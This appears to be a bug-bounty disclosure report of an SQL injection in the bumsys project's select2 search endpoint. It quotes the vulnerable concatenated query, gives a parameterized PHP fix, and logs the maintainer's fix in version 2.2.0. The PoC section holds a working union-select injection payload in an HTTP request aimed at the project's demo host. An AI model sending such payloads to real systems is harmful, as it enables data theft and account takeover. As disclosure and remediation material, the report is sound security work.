SQL Injection in unilogies/bumsys

Valid

Reported on Mar 5th 2023


Description

In '/core/ajax/ajax_select2.php#L989' the search term is concatenated directly into the SQL string:

"is_trash = 0 and date(batch_expiry_date) >= curdate() and batch_number LIKE '". $search ."%'"

$search comes from:

    $search = isset($_GET['q']) ? $_GET['q'] : "";

with no sanitization or parameterization, so a single quote in the q parameter breaks out of the string literal.
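The concatenation described above next to a parameterized version, as an added example that is not bumsys code: the table name `batches`, the in-memory SQLite stand-in and its `curdate()` shim are assumptions; the WHERE clause and column names are taken from the report.

```php
<?php
declare(strict_types=1);
// Added example, not bumsys code. Table name `batches` and the SQLite stand-in
// are assumptions; the WHERE clause and column names come from the report.

// The pattern the report describes: the q parameter is spliced into SQL text,
// so a quote in the input ends the string literal and the rest is parsed as SQL.
function vulnerableBatchQuery(string $search): string
{
    return 'SELECT batch_number FROM batches WHERE is_trash = 0'
        . ' AND date(batch_expiry_date) >= curdate()'
        . " AND batch_number LIKE '" . $search . "%'";
}

// Hardened form: the value is bound, never concatenated, and the LIKE
// metacharacters % and _ are escaped so "10%" does not become a wildcard match.
function safeBatchSearch(PDO $pdo, string $search): array
{
    $pattern = strtr($search, ['!' => '!!', '%' => '!%', '_' => '!_']) . '%';
    $stmt = $pdo->prepare(
        'SELECT batch_number FROM batches WHERE is_trash = 0'
        . ' AND date(batch_expiry_date) >= curdate()'
        . " AND batch_number LIKE :pattern ESCAPE '!'"
    );
    $stmt->execute([':pattern' => $pattern]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// In-memory SQLite so the example runs offline; curdate() is registered to
// mimic MySQL. Point $pdo at the real database to run the same query on MySQL.
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->sqliteCreateFunction('curdate', fn(): string => date('Y-m-d'), 0);
$pdo->exec('CREATE TABLE batches (batch_number TEXT, batch_expiry_date TEXT, is_trash INTEGER)');
// Constructed sample rows.
$pdo->exec("INSERT INTO batches VALUES ('B-1001', '2999-01-01', 0), ('B-2002', '2999-01-01', 0), ('X_1', '2999-01-01', 0)");

// Constructed input carrying the single quote the report's PoC relies on.
$input = "1'union select 1,2#";
echo vulnerableBatchQuery($input), PHP_EOL;   // the quote terminates the literal: injectable
var_dump(safeBatchSearch($pdo, $input));      // bound as data: matched only as a literal prefix
var_dump(safeBatchSearch($pdo, 'B-'));        // ordinary prefix search still works
var_dump(safeBatchSearch($pdo, '_'));         // escaped: matches a literal underscore, not any character
```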

PoC

GET /info/?module=select2&page=batchList&q=1'union/*%23&pid=1*/select+111,222%23 HTTP/1.1
Host: demo.bumsys.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json; charset=utf-8
X-CSRF-TOKEN: 362b7f15990a766dde434ec43519db3daede216f
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: https://demo.bumsys.org/home/
Cookie: __c56ed801e959f2a2fda4de832eed05a0e7282e6a=cvv12rvqd8nnvdpv5e5a0g3903; __681be8b1f633295b0ca7f80a382ce1421cc19860=17obctlf4ebl2k45mj6rasskq3; eid=1; currencySymbol=%E0%A7%B3; keepAlive=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin


Impact

Information leakage, admin account takeover, RCE and other attack vectors.

We are processing your report and will contact the unilogies/bumsys team within 24 hours. 3 months ago
We have contacted a member of the unilogies/bumsys team and are waiting to hear back 3 months ago
unilogies/bumsys maintainer validated this vulnerability 3 months ago
ka1n4t has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Khurshid Alam marked this as fixed in 2.2.0 with commit 1b426f a month ago
Khurshid Alam has been awarded the fix bounty
This vulnerability will not receive a CVE
Khurshid Alam published this vulnerability a month ago
Khurshid Alam (Maintainer), a month ago:

Thank you so much.
